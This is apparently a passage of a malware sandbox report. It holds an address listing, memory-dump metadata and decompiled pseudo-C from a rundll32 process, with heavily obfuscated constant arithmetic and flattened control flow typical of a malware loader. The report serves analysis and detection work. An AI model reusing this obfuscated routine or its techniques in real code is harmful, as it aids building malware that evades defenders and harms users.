                                                                      						__eflags = _t1034 - 0x2084686f;
                                                                      						if(_t1034 != 0x2084686f) {
                                                                      							goto L105;
                                                                      						}
                                                                      						_t1115 = _v404;
                                                                      						E01FF9106(_v404, _v240, _v412,  &_v128,  &_v156);
                                                                      						_t1145 = _t1145 + 0x10;
                                                                      						asm("sbb ecx, ecx");
                                                                      						_t1034 = (_v396 & 0x0c4ba634) + 0x23cd63af;
                                                                      						goto L1;
                                                                      						L105:
                                                                      						__eflags = _t1034 - 0x25829b99;
                                                                      					} while (__eflags != 0);
                                                                      					goto L110;
                                                                      				}
                                                                      			}
                                                                      0x020058de
                                                                      0x020058e9
                                                                      0x020058f4
                                                                      0x020058ff
                                                                      0x0200590a
                                                                      0x02005912
                                                                      0x0200591d
                                                                      0x02005928
                                                                      0x02005933
                                                                      0x0200593e
                                                                      0x02005949
                                                                      0x02005954
                                                                      0x0200595f
                                                                      0x02005967
                                                                      0x02005972
                                                                      0x0200597d
                                                                      0x02005988
                                                                      0x02005993
                                                                      0x020059a5
                                                                      0x020059a8
                                                                      0x020059af
                                                                      0x020059ba
                                                                      0x020059c2
                                                                      0x020059ca
                                                                      0x020059d7
                                                                      0x020059dc
                                                                      0x020059e2
                                                                      0x020059ea
                                                                      0x020059f5
                                                                      0x020059fd
                                                                      0x02005a08
                                                                      0x02005a10
                                                                      0x02005a15
                                                                      0x02005a22
                                                                      0x02005a23
                                                                      0x02005a27
                                                                      0x02005a2f
                                                                      0x02005a3c
                                                                      0x02005a40
                                                                      0x02005a48
                                                                      0x02005a50
                                                                      0x02005a58
                                                                      0x02005a63
                                                                      0x02005a6e
                                                                      0x02005a79
                                                                      0x02005a84
                                                                      0x02005a8f
                                                                      0x02005a9a
                                                                      0x02005aa5
                                                                      0x02005ab0
                                                                      0x02005ab8
                                                                      0x02005ac3
                                                                      0x02005ace
                                                                      0x02005ad9
                                                                      0x02005ae4
                                                                      0x02005aef
                                                                      0x02005afa
                                                                      0x02005b05
                                                                      0x02005b10
                                                                      0x02005b1b
                                                                      0x02005b26
                                                                      0x02005b31
                                                                      0x02005b3c
                                                                      0x02005b47
                                                                      0x02005b52
                                                                      0x02005b5d
                                                                      0x02005b68
                                                                      0x02005b73
                                                                      0x02005b7e
                                                                      0x02005b89
                                                                      0x02005b94
                                                                      0x02005b9f
                                                                      0x02005baa
                                                                      0x02005bb5
                                                                      0x02005bbd
                                                                      0x02005bcb
                                                                      0x02005bd4
                                                                      0x02005bd8
                                                                      0x02005be0
                                                                      0x02005beb
                                                                      0x02005bf3
                                                                      0x02005bfa
                                                                      0x02005c05
                                                                      0x02005c10
                                                                      0x02005c1b
                                                                      0x02005c26
                                                                      0x02005c33
                                                                      0x02005c3c
                                                                      0x02005c40
                                                                      0x02005c45
                                                                      0x02005c4d
                                                                      0x02005c55
                                                                      0x02005c62
                                                                      0x02005c67
                                                                      0x02005c6d
                                                                      0x02005c75
                                                                      0x02005c7d
                                                                      0x02005c88
                                                                      0x02005c90
                                                                      0x02005c98
                                                                      0x02005ca3
                                                                      0x02005caf
                                                                      0x02005cb4
                                                                      0x02005cb8
                                                                      0x02005cbd
                                                                      0x02005cc5
                                                                      0x02005ccd
                                                                      0x02005cd8
                                                                      0x02005ce3
                                                                      0x02005cee
                                                                      0x02005cf9
                                                                      0x02005d04
                                                                      0x02005d0f
                                                                      0x02005d1a
                                                                      0x02005d25
                                                                      0x02005d2d
                                                                      0x02005d35
                                                                      0x02005d40
                                                                      0x02005d4b
                                                                      0x02005d5b
                                                                      0x02005d5c
                                                                      0x02005d63
                                                                      0x02005d6e
                                                                      0x02005d79
                                                                      0x02005d84
                                                                      0x02005d8f
                                                                      0x02005d9a
                                                                      0x02005da5
                                                                      0x02005db0
                                                                      0x02005dbb
                                                                      0x02005dc3
                                                                      0x02005dcb
                                                                      0x02005dd0
                                                                      0x02005dd5
                                                                      0x02005ddd
                                                                      0x02005de8
                                                                      0x02005df3
                                                                      0x02005dfe
                                                                      0x02005e06
                                                                      0x02005e0e
                                                                      0x02005e16
                                                                      0x02005e1e
                                                                      0x02005e26
                                                                      0x02005e2e
                                                                      0x02005e38
                                                                      0x02005e41
                                                                      0x02005e45
                                                                      0x02005e4d
                                                                      0x02005e58
                                                                      0x02005e63
                                                                      0x02005e6e
                                                                      0x02005e79
                                                                      0x02005e84
                                                                      0x02005e8f
                                                                      0x02005e9a
                                                                      0x02005ea5
                                                                      0x02005eb0
                                                                      0x02005ebd
                                                                      0x02005ecd
                                                                      0x02005ed3
                                                                      0x02005edb
                                                                      0x02005ee3
                                                                      0x02005eeb
                                                                      0x02005efe
                                                                      0x02005f01
                                                                      0x02005f08
                                                                      0x02005f13
                                                                      0x02005f1e
                                                                      0x02005f29
                                                                      0x02005f32
                                                                      0x02005f33
                                                                      0x02005f41
                                                                      0x02005f48
                                                                      0x02005f53
                                                                      0x02005f5b
                                                                      0x02005f63
                                                                      0x02005f6b
                                                                      0x02005f73
                                                                      0x02005f7b
                                                                      0x02005f83
                                                                      0x02005f8b
                                                                      0x02005f93
                                                                      0x02005f9b
                                                                      0x02005fa3
                                                                      0x02005fab
                                                                      0x02005fb0
                                                                      0x02005fbd
                                                                      0x02005fbe
                                                                      0x02005fc2
                                                                      0x02005fca
                                                                      0x02005fd5
                                                                      0x02005fe8
                                                                      0x02005fef
                                                                      0x02005ffa
                                                                      0x02006002
                                                                      0x0200600a
                                                                      0x02006012
                                                                      0x0200601a
                                                                      0x02006022
                                                                      0x0200602d
                                                                      0x02006038
                                                                      0x02006040
                                                                      0x0200604b
                                                                      0x02006056
                                                                      0x02006061
                                                                      0x02006069
                                                                      0x02006074
                                                                      0x0200607c
                                                                      0x02006084
                                                                      0x0200608c
                                                                      0x02006094
                                                                      0x0200609c
                                                                      0x020060a7
                                                                      0x020060b2
                                                                      0x020060bd
                                                                      0x020060c8
                                                                      0x020060d0
                                                                      0x020060db
                                                                      0x020060e6
                                                                      0x020060f1
                                                                      0x020060fc
                                                                      0x02006107
                                                                      0x02006114
                                                                      0x02006118
                                                                      0x0200612a
                                                                      0x02006130
                                                                      0x0200613d
                                                                      0x02006155
                                                                      0x02006156
                                                                      0x0200615d
                                                                      0x02006164
                                                                      0x0200616f
                                                                      0x0200617a
                                                                      0x0200618b
                                                                      0x02006192
                                                                      0x02006199
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x020061a9
                                                                      0x020061a9
                                                                      0x020061a9
                                                                      0x020061a9
                                                                      0x020061af
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x020061b5
                                                                      0x020065a9
                                                                      0x020065ab
                                                                      0x020065d5
                                                                      0x020065dc
                                                                      0x020065e4
                                                                      0x020065ad
                                                                      0x020065b4
                                                                      0x020065bb
                                                                      0x020065c3
                                                                      0x020065c3
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x00000000
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x020061bb
                                                                      0x020061bd
                                                                      0x020063a1
                                                                      0x020063a7
                                                                      0x02006471
                                                                      0x02006477
                                                                      0x02006596
                                                                      0x00000000
                                                                      0x02006596
                                                                      0x0200647d
                                                                      0x02006483
                                                                      0x02006517
                                                                      0x02006537
                                                                      0x02006563
                                                                      0x02006576
                                                                      0x02006584
                                                                      0x02006589
                                                                      0x0200658c
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x00000000
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x02006489
                                                                      0x0200648f
                                                                      0x020064d3
                                                                      0x020064d5
                                                                      0x0200621e
                                                                      0x0200621e
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x00000000
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x020064e2
                                                                      0x020064f2
                                                                      0x020064ff
                                                                      0x02006506
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x00000000
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x02006491
                                                                      0x02006497
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x020064a6
                                                                      0x020064ad
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x00000000
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x020063ad
                                                                      0x02006462
                                                                      0x02006467
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x00000000
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x020063b3
                                                                      0x020063b9
                                                                      0x02006446
                                                                      0x02006454
                                                                      0x02006404
                                                                      0x02006405
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x00000000
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x020063bf
                                                                      0x020063c5
                                                                      0x02006433
                                                                      0x02006438

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: C$$ 9$!n$"v$%'$%c$-o$/$1f$3n$4$6g$7$>lO$@e7$G?B$GS$J-,$J-,$J-,$LS$N6$R$T`$T$VV$dP$jV$j^$kg$nl$v1$3$7$>$B$|
                                                                      • API String ID: 0-3933709873
                                                                      • Opcode ID: 66f4f4cbdfef4eaf4ae9ffe7777e528aa4aaf4be1a39a45842c7e379e678c8ce
                                                                      • Instruction ID: a2308d86a80c21bfd0c691438ea2f9005020984120f3e9f1bbb002ff6ba5d554
                                                                      • Opcode Fuzzy Hash: 66f4f4cbdfef4eaf4ae9ffe7777e528aa4aaf4be1a39a45842c7e379e678c8ce
                                                                      • Instruction Fuzzy Hash: 50B214715093818BE3B8CF65C49979FBBE6BFC4314F10891DE18A862A0DBB58949DF43
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 74%
                                                                      			E01FF7FFE(signed int __ecx, signed int __edx) {
                                                                      				void* __edi;
                                                                      				void* _t669;
                                                                      				intOrPtr _t720;
                                                                      				void* _t726;
                                                                      				void* _t741;
                                                                      				void* _t742;
                                                                      				void* _t745;
                                                                      				short _t775;
                                                                      				signed int _t776;
                                                                      				signed int _t777;
                                                                      				signed int _t778;
                                                                      				signed int _t779;
                                                                      				signed int _t780;
                                                                      				signed int _t781;
                                                                      				signed int _t782;
                                                                      				signed int _t783;
                                                                      				signed int _t784;
                                                                      				signed int _t785;
                                                                      				signed int _t786;
                                                                      				signed int _t787;
                                                                      				signed int _t788;
                                                                      				signed int _t789;
                                                                      				signed int _t790;
                                                                      				intOrPtr _t791;
                                                                      				void* _t795;
                                                                      				signed int _t801;
                                                                      				signed int _t807;
                                                                      				signed int _t809;
                                                                      				signed int _t811;
                                                                      				signed int _t826;
                                                                      				signed int _t828;
                                                                      				signed char* _t881;
                                                                      				void* _t882;
                                                                      				signed int _t889;
                                                                      				short* _t890;
                                                                      				short* _t891;
                                                                      				signed int _t892;
                                                                      				signed int _t897;
                                                                      				signed int _t899;
                                                                      				void* _t901;
                                                                      				void* _t902;
                                                                      				void* _t903;
                                                                      				void* _t904;
                                                                      				void* _t905;
                                                                      				void* _t906;
                                                                      				void* _t908;
                                                                      				void* _t909;
                                                                      
                                                                      				_push( *((intOrPtr*)(_t902 + 0xc6c)));
                                                                      				_t889 = __edx;
                                                                      				_t892 = __ecx;
                                                                      				_push( *((intOrPtr*)(_t902 + 0xc6c)));
                                                                      				 *((intOrPtr*)(_t902 + 0x148)) = __edx;
                                                                      				_push( *((intOrPtr*)(_t902 + 0xc6c)));
                                                                      				 *((intOrPtr*)(_t902 + 0x12c)) = __ecx;
                                                                      				_push(__edx);
                                                                      				_push(__ecx);
                                                                      				E02002550(_t669);
                                                                      				 *((intOrPtr*)(_t902 + 0xe0)) = 0x50c;
                                                                      				_t903 = _t902 + 0x14;
                                                                      				 *(_t903 + 0xcc) =  *(_t903 + 0xcc) ^ 0x43c2c0f0;
                                                                      				_t899 = 0;
                                                                      				_t795 = 0x2392656c;
                                                                      				 *(_t903 + 0x128) = 0;
                                                                      				_t776 = 3;
                                                                      				 *(_t903 + 0xd0) =  *(_t903 + 0xcc) / _t776;
                                                                      				 *(_t903 + 0xd0) =  *(_t903 + 0xd0) ^ 0x16964c14;
                                                                      				 *(_t903 + 0xcc) = 0x7d6c;
                                                                      				 *(_t903 + 0xcc) =  *(_t903 + 0xcc) + 0xffff22e1;
                                                                      				 *(_t903 + 0xcc) =  *(_t903 + 0xcc) >> 3;
                                                                      				 *(_t903 + 0xcc) =  *(_t903 + 0xcc) ^ 0x1fffd9b4;
                                                                      				 *(_t903 + 0x74) = 0xc1a1;
                                                                      				 *(_t903 + 0x74) =  *(_t903 + 0x74) << 7;
                                                                      				 *(_t903 + 0x74) =  *(_t903 + 0x74) | 0x752db8c7;
                                                                      				 *(_t903 + 0x74) =  *(_t903 + 0x74) ^ 0x756d9f65;
                                                                      				 *(_t903 + 0x54) = 0x6653;
                                                                      				 *(_t903 + 0x54) =  *(_t903 + 0x54) | 0xef6ea2da;
                                                                      				_t777 = 0x4f;
                                                                      				 *(_t903 + 0x54) =  *(_t903 + 0x54) * 0x2c;
                                                                      				 *(_t903 + 0x54) =  *(_t903 + 0x54) ^ 0xfdea2aeb;
                                                                      				 *(_t903 + 0x54) =  *(_t903 + 0x54) ^ 0xdae5ba81;
                                                                      				 *(_t903 + 0x90) = 0x1ae0;
                                                                      				 *(_t903 + 0x90) =  *(_t903 + 0x90) + 0x9dd2;
                                                                      				 *(_t903 + 0x90) =  *(_t903 + 0x90) / _t777;
                                                                      				 *(_t903 + 0x90) =  *(_t903 + 0x90) ^ 0x00001273;
                                                                      				 *(_t903 + 0x7c) = 0x91ad;
                                                                      				 *(_t903 + 0x7c) =  *(_t903 + 0x7c) + 0x8a7f;
                                                                      				 *(_t903 + 0x7c) =  *(_t903 + 0x7c) + 0xffff15ba;
                                                                      				 *(_t903 + 0x7c) =  *(_t903 + 0x7c) ^ 0x00003314;
                                                                      				 *(_t903 + 0x118) = 0xd3f6;
                                                                      				 *(_t903 + 0x118) =  *(_t903 + 0x118) >> 6;
                                                                      				 *(_t903 + 0x118) =  *(_t903 + 0x118) ^ 0x00006a76;
                                                                      				 *(_t903 + 0xdc) = 0x5b3d;
                                                                      				 *(_t903 + 0xdc) =  *(_t903 + 0xdc) << 7;
                                                                      				 *(_t903 + 0xdc) =  *(_t903 + 0xdc) ^ 0x002dec83;
                                                                      				 *(_t903 + 0xe4) = 0xe1a3;
                                                                      				 *(_t903 + 0xe4) =  *(_t903 + 0xe4) + 0xb61a;
                                                                      				 *(_t903 + 0xe4) =  *(_t903 + 0xe4) ^ 0x00019054;
                                                                      				 *(_t903 + 0xac) = 0xd034;
                                                                      				_t778 = 0x41;
                                                                      				 *(_t903 + 0xa8) =  *(_t903 + 0xac) * 0x21;
                                                                      				 *(_t903 + 0xa8) =  *(_t903 + 0xa8) >> 5;
                                                                      				 *(_t903 + 0xa8) =  *(_t903 + 0xa8) ^ 0x0000a5df;
                                                                      				 *(_t903 + 0x5c) = 0xce7d;
                                                                      				 *(_t903 + 0x5c) =  *(_t903 + 0x5c) << 0xb;
                                                                      				 *(_t903 + 0x5c) =  *(_t903 + 0x5c) + 0xffff4afa;
                                                                      				 *(_t903 + 0x5c) =  *(_t903 + 0x5c) / _t778;
                                                                      				 *(_t903 + 0x5c) =  *(_t903 + 0x5c) ^ 0x0019198d;
                                                                      				 *(_t903 + 0x54) = 0xea37;
                                                                      				 *(_t903 + 0x54) =  *(_t903 + 0x54) * 0x7f;
                                                                      				_t779 = 0x75;
                                                                      				 *(_t903 + 0x58) =  *(_t903 + 0x54) / _t779;
                                                                      				 *(_t903 + 0x58) =  *(_t903 + 0x58) + 0x6eec;
                                                                      				 *(_t903 + 0x58) =  *(_t903 + 0x58) ^ 0x00015ac8;
                                                                      				 *(_t903 + 0x100) = 0xf0b;
                                                                      				 *(_t903 + 0x100) =  *(_t903 + 0x100) >> 1;
                                                                      				 *(_t903 + 0x100) =  *(_t903 + 0x100) ^ 0x000046ed;
                                                                      				 *(_t903 + 0x98) = 0xe523;
                                                                      				 *(_t903 + 0x98) =  *(_t903 + 0x98) >> 0xf;
                                                                      				 *(_t903 + 0x98) =  *(_t903 + 0x98) + 0xbd6d;
                                                                      				 *(_t903 + 0x98) =  *(_t903 + 0x98) ^ 0x0000db22;
                                                                      				 *(_t903 + 0xf8) = 0xa379;
                                                                      				 *(_t903 + 0xf8) =  *(_t903 + 0xf8) + 0xffffc366;
                                                                      				 *(_t903 + 0xf8) =  *(_t903 + 0xf8) ^ 0x00004ea3;
                                                                      				 *(_t903 + 0xc8) = 0x9609;
                                                                      				 *(_t903 + 0xc8) =  *(_t903 + 0xc8) | 0xfc9b1668;
                                                                      				 *(_t903 + 0xc8) =  *(_t903 + 0xc8) >> 2;
                                                                      				 *(_t903 + 0xc8) =  *(_t903 + 0xc8) ^ 0x3f26f1c9;
                                                                      				 *(_t903 + 0x110) = 0x93e8;
                                                                      				 *(_t903 + 0x110) =  *(_t903 + 0x110) ^ 0x6cc9c780;
                                                                      				 *(_t903 + 0x110) =  *(_t903 + 0x110) ^ 0x6cc954eb;
                                                                      				 *(_t903 + 0xc4) = 0x193a;
                                                                      				_t780 = 0x59;
                                                                      				 *(_t903 + 0xc4) =  *(_t903 + 0xc4) / _t780;
                                                                      				_t781 = 0x1b;
                                                                      				 *(_t903 + 0xc0) =  *(_t903 + 0xc4) * 0x78;
                                                                      				 *(_t903 + 0xc0) =  *(_t903 + 0xc0) ^ 0x00004d55;
                                                                      				 *(_t903 + 0x28) = 0x9917;
                                                                      				 *(_t903 + 0x28) =  *(_t903 + 0x28) + 0xffff1acc;
                                                                      				 *(_t903 + 0x28) =  *(_t903 + 0x28) << 0xe;
                                                                      				 *(_t903 + 0x28) =  *(_t903 + 0x28) >> 1;
                                                                      				 *(_t903 + 0x28) =  *(_t903 + 0x28) ^ 0x767c70b9;
                                                                      				 *(_t903 + 0x60) = 0x87fb;
                                                                      				 *(_t903 + 0x60) =  *(_t903 + 0x60) << 0xc;
                                                                      				 *(_t903 + 0x60) =  *(_t903 + 0x60) << 7;
                                                                      				 *(_t903 + 0x60) =  *(_t903 + 0x60) + 0x251d;
                                                                      				 *(_t903 + 0x60) =  *(_t903 + 0x60) ^ 0x3fd826f7;
                                                                      				 *(_t903 + 0x80) = 0x50e5;
                                                                      				 *(_t903 + 0x80) =  *(_t903 + 0x80) >> 0xc;
                                                                      				 *(_t903 + 0x80) =  *(_t903 + 0x80) + 0xffff07fe;
                                                                      				 *(_t903 + 0x80) =  *(_t903 + 0x80) ^ 0xffff3d49;
                                                                      				 *(_t903 + 0x90) = 0xf831;
                                                                      				 *(_t903 + 0x90) =  *(_t903 + 0x90) << 9;
                                                                      				 *(_t903 + 0x90) =  *(_t903 + 0x90) << 3;
                                                                      				 *(_t903 + 0x90) =  *(_t903 + 0x90) ^ 0x0f836fd5;
                                                                      				 *(_t903 + 0x58) = 0xa7c7;
                                                                      				 *(_t903 + 0x58) =  *(_t903 + 0x58) + 0xffff9b8f;
                                                                      				 *(_t903 + 0x58) =  *(_t903 + 0x58) + 0xdad5;
                                                                      				 *(_t903 + 0x58) =  *(_t903 + 0x58) << 0xb;
                                                                      				 *(_t903 + 0x58) =  *(_t903 + 0x58) ^ 0x08f13b63;
                                                                      				 *(_t903 + 0xb0) = 0x3244;
                                                                      				 *(_t903 + 0xb0) =  *(_t903 + 0xb0) | 0x63ae54c5;
                                                                      				 *(_t903 + 0xb0) =  *(_t903 + 0xb0) + 0xffffb71c;
                                                                      				 *(_t903 + 0xb0) =  *(_t903 + 0xb0) ^ 0x63ae2d72;
                                                                      				 *(_t903 + 0x30) = 0x96f4;
                                                                      				 *(_t903 + 0x30) =  *(_t903 + 0x30) + 0xfffff5ad;
                                                                      				 *(_t903 + 0x30) =  *(_t903 + 0x30) / _t781;
                                                                      				 *(_t903 + 0x30) =  *(_t903 + 0x30) ^ 0x2e666d06;
                                                                      				 *(_t903 + 0x30) =  *(_t903 + 0x30) ^ 0x2e665524;
                                                                      				 *(_t903 + 0x88) = 0xa705;
                                                                      				 *(_t903 + 0x88) =  *(_t903 + 0x88) << 9;
                                                                      				 *(_t903 + 0x88) =  *(_t903 + 0x88) + 0x9771;
                                                                      				 *(_t903 + 0x88) =  *(_t903 + 0x88) ^ 0x014ee7b1;
                                                                      				 *(_t903 + 0x48) = 0x3d5e;
                                                                      				 *(_t903 + 0x48) =  *(_t903 + 0x48) + 0xffff4ae5;
                                                                      				 *(_t903 + 0x48) =  *(_t903 + 0x48) | 0x14fe6d6d;
                                                                      				 *(_t903 + 0x48) =  *(_t903 + 0x48) << 2;
                                                                      				 *(_t903 + 0x48) =  *(_t903 + 0x48) ^ 0xffffae8a;
                                                                      				 *(_t903 + 0x11c) = 0x676a;
                                                                      				_t782 = 0x3b;
                                                                      				 *(_t903 + 0x120) =  *(_t903 + 0x11c) / _t782;
                                                                      				 *(_t903 + 0x120) =  *(_t903 + 0x120) ^ 0x00006974;
                                                                      				 *(_t903 + 0xbc) = 0x626d;
                                                                      				 *(_t903 + 0xbc) =  *(_t903 + 0xbc) + 0xc5ef;
                                                                      				 *(_t903 + 0xbc) =  *(_t903 + 0xbc) + 0xffff67d0;
                                                                      				 *(_t903 + 0xbc) =  *(_t903 + 0xbc) ^ 0x0000ba9c;
                                                                      				 *(_t903 + 0x9c) = 0xc74f;
                                                                      				 *(_t903 + 0x9c) =  *(_t903 + 0x9c) ^ 0xf6981ca9;
                                                                      				 *(_t903 + 0x9c) =  *(_t903 + 0x9c) >> 9;
                                                                      				 *(_t903 + 0x9c) =  *(_t903 + 0x9c) ^ 0x007b070d;
                                                                      				 *(_t903 + 0xd4) = 0xabeb;
                                                                      				 *(_t903 + 0xd4) =  *(_t903 + 0xd4) + 0xffff5ef9;
                                                                      				 *(_t903 + 0xd4) =  *(_t903 + 0xd4) >> 7;
                                                                      				 *(_t903 + 0xd4) =  *(_t903 + 0xd4) ^ 0x000061f9;
                                                                      				 *(_t903 + 0x11c) = 0x4b6;
                                                                      				_t783 = 0x58;
                                                                      				 *(_t903 + 0x11c) =  *(_t903 + 0x11c) * 0x12;
                                                                      				 *(_t903 + 0x11c) =  *(_t903 + 0x11c) ^ 0x000028b0;
                                                                      				 *(_t903 + 0x80) = 0x3500;
                                                                      				 *(_t903 + 0x80) =  *(_t903 + 0x80) + 0xffff2fa1;
                                                                      				 *(_t903 + 0x80) =  *(_t903 + 0x80) * 0x6d;
                                                                      				 *(_t903 + 0x80) =  *(_t903 + 0x80) ^ 0xffbdaa6d;
                                                                      				 *(_t903 + 0x44) = 0x660e;
                                                                      				 *(_t903 + 0x44) =  *(_t903 + 0x44) + 0xffffa604;
                                                                      				 *(_t903 + 0x44) =  *(_t903 + 0x44) + 0xffff1443;
                                                                      				 *(_t903 + 0x44) =  *(_t903 + 0x44) + 0xffff2243;
                                                                      				 *(_t903 + 0x44) =  *(_t903 + 0x44) ^ 0xfffe0557;
                                                                      				 *(_t903 + 0xfc) = 0x57ec;
                                                                      				 *(_t903 + 0xfc) =  *(_t903 + 0xfc) / _t783;
                                                                      				 *(_t903 + 0xfc) =  *(_t903 + 0xfc) ^ 0x0000115a;
                                                                      				 *(_t903 + 0x30) = 0x1e40;
                                                                      				 *(_t903 + 0x30) =  *(_t903 + 0x30) + 0xd54d;
                                                                      				 *(_t903 + 0x30) =  *(_t903 + 0x30) << 0x10;
                                                                      				 *(_t903 + 0x30) =  *(_t903 + 0x30) << 0xc;
                                                                      				 *(_t903 + 0x30) =  *(_t903 + 0x30) ^ 0xd00054ed;
                                                                      				 *(_t903 + 0xa8) = 0x247b;
                                                                      				 *(_t903 + 0xa8) =  *(_t903 + 0xa8) ^ 0xf4c628ae;
                                                                      				 *(_t903 + 0xa8) =  *(_t903 + 0xa8) << 4;
                                                                      				 *(_t903 + 0xa8) =  *(_t903 + 0xa8) ^ 0x4c6080cc;
                                                                      				 *(_t903 + 0xa0) = 0x874d;
                                                                      				 *(_t903 + 0xa0) =  *(_t903 + 0xa0) ^ 0x714f4b1a;
                                                                      				_t784 = 0x12;
                                                                      				 *(_t903 + 0xa0) =  *(_t903 + 0xa0) / _t784;
                                                                      				 *(_t903 + 0xa0) =  *(_t903 + 0xa0) ^ 0x064b94f9;
                                                                      				 *(_t903 + 0x108) = 0x5442;
                                                                      				 *(_t903 + 0x108) =  *(_t903 + 0x108) << 0xb;
                                                                      				 *(_t903 + 0x108) =  *(_t903 + 0x108) ^ 0x02a2423c;
                                                                      				 *(_t903 + 0x40) = 0xc63;
                                                                      				 *(_t903 + 0x40) =  *(_t903 + 0x40) | 0xcf27a650;
                                                                      				 *(_t903 + 0x40) =  *(_t903 + 0x40) << 4;
                                                                      				_t785 = 0x69;
                                                                      				 *(_t903 + 0x3c) =  *(_t903 + 0x40) * 0x42;
                                                                      				 *(_t903 + 0x3c) =  *(_t903 + 0x3c) ^ 0x83afb13c;
                                                                      				 *(_t903 + 0xb4) = 0x9ee9;
                                                                      				 *(_t903 + 0xb4) =  *(_t903 + 0xb4) / _t785;
                                                                      				 *(_t903 + 0xb4) =  *(_t903 + 0xb4) ^ 0x2c71e887;
                                                                      				 *(_t903 + 0xb4) =  *(_t903 + 0xb4) ^ 0x2c71a0f8;
                                                                      				 *(_t903 + 0xac) = 0xebb1;
                                                                      				 *(_t903 + 0xac) =  *(_t903 + 0xac) + 0xffffa53b;
                                                                      				 *(_t903 + 0xac) =  *(_t903 + 0xac) + 0x1487;
                                                                      				 *(_t903 + 0xac) =  *(_t903 + 0xac) ^ 0x00009fba;
                                                                      				 *(_t903 + 0x34) = 0xd0fd;
                                                                      				_t786 = 0x5a;
                                                                      				 *(_t903 + 0x38) =  *(_t903 + 0x34) * 0x48;
                                                                      				 *(_t903 + 0x38) =  *(_t903 + 0x38) + 0x677b;
                                                                      				 *(_t903 + 0x38) =  *(_t903 + 0x38) * 0x39;
                                                                      				 *(_t903 + 0x38) =  *(_t903 + 0x38) ^ 0x0d2d2b78;
                                                                      				 *(_t903 + 0xc0) = 0x7c5c;
                                                                      				 *(_t903 + 0xc0) =  *(_t903 + 0xc0) | 0xa19321e3;
                                                                      				 *(_t903 + 0xc0) =  *(_t903 + 0xc0) / _t786;
                                                                      				 *(_t903 + 0xc0) =  *(_t903 + 0xc0) ^ 0x01cbc5b7;
                                                                      				 *(_t903 + 0x50) = 0x8c18;
                                                                      				_t787 = 7;
                                                                      				 *(_t903 + 0x50) =  *(_t903 + 0x50) / _t787;
                                                                      				 *(_t903 + 0x50) =  *(_t903 + 0x50) << 0xc;
                                                                      				_t788 = 0x1e;
                                                                      				 *(_t903 + 0x50) =  *(_t903 + 0x50) * 0x1c;
                                                                      				 *(_t903 + 0x50) =  *(_t903 + 0x50) ^ 0x23051aa0;
                                                                      				 *(_t903 + 0x48) = 0x3d7;
                                                                      				 *(_t903 + 0x48) =  *(_t903 + 0x48) + 0x6ad2;
                                                                      				 *(_t903 + 0x48) =  *(_t903 + 0x48) + 0x792;
                                                                      				 *(_t903 + 0x48) =  *(_t903 + 0x48) / _t788;
                                                                      				 *(_t903 + 0x48) =  *(_t903 + 0x48) ^ 0x00005768;
                                                                      				 *(_t903 + 0xf0) = 0xd2ba;
                                                                      				 *(_t903 + 0xf0) =  *(_t903 + 0xf0) << 3;
                                                                      				 *(_t903 + 0xf0) =  *(_t903 + 0xf0) ^ 0x00069d23;
                                                                      				 *(_t903 + 0x114) = 0x19d1;
                                                                      				 *(_t903 + 0x114) =  *(_t903 + 0x114) + 0xffff4333;
                                                                      				 *(_t903 + 0x114) =  *(_t903 + 0x114) ^ 0xffff39ec;
                                                                      				 *(_t903 + 0x6c) = 0x599b;
                                                                      				_t789 = 0x61;
                                                                      				 *(_t903 + 0x6c) =  *(_t903 + 0x6c) / _t789;
                                                                      				 *(_t903 + 0x6c) =  *(_t903 + 0x6c) ^ 0x240846c0;
                                                                      				 *(_t903 + 0x6c) =  *(_t903 + 0x6c) ^ 0x24081360;
                                                                      				 *(_t903 + 0x28) = 0xb43b;
                                                                      				 *(_t903 + 0x28) =  *(_t903 + 0x28) + 0xffffc9d6;
                                                                      				 *(_t903 + 0x28) =  *(_t903 + 0x28) + 0xffff5756;
                                                                      				 *(_t903 + 0x28) =  *(_t903 + 0x28) >> 0xe;
                                                                      				 *(_t903 + 0x28) =  *(_t903 + 0x28) ^ 0x00038714;
                                                                      				 *(_t903 + 0x20) = 0x2b90;
                                                                      				 *(_t903 + 0x20) =  *(_t903 + 0x20) + 0x9fcd;
                                                                      				 *(_t903 + 0x20) =  *(_t903 + 0x20) >> 9;
                                                                      				 *(_t903 + 0x20) =  *(_t903 + 0x20) << 0xa;
                                                                      				 *(_t903 + 0x20) =  *(_t903 + 0x20) ^ 0x000194c5;
                                                                      				 *(_t903 + 0x104) = 0xeacc;
                                                                      				 *(_t903 + 0x104) =  *(_t903 + 0x104) << 0x10;
                                                                      				 *(_t903 + 0x104) =  *(_t903 + 0x104) ^ 0xeacc46e0;
                                                                      				 *(_t903 + 0x1c) = 0x2e68;
                                                                      				 *(_t903 + 0x1c) =  *(_t903 + 0x1c) ^ 0x15408aca;
                                                                      				 *(_t903 + 0x1c) =  *(_t903 + 0x1c) ^ 0xc28f26d4;
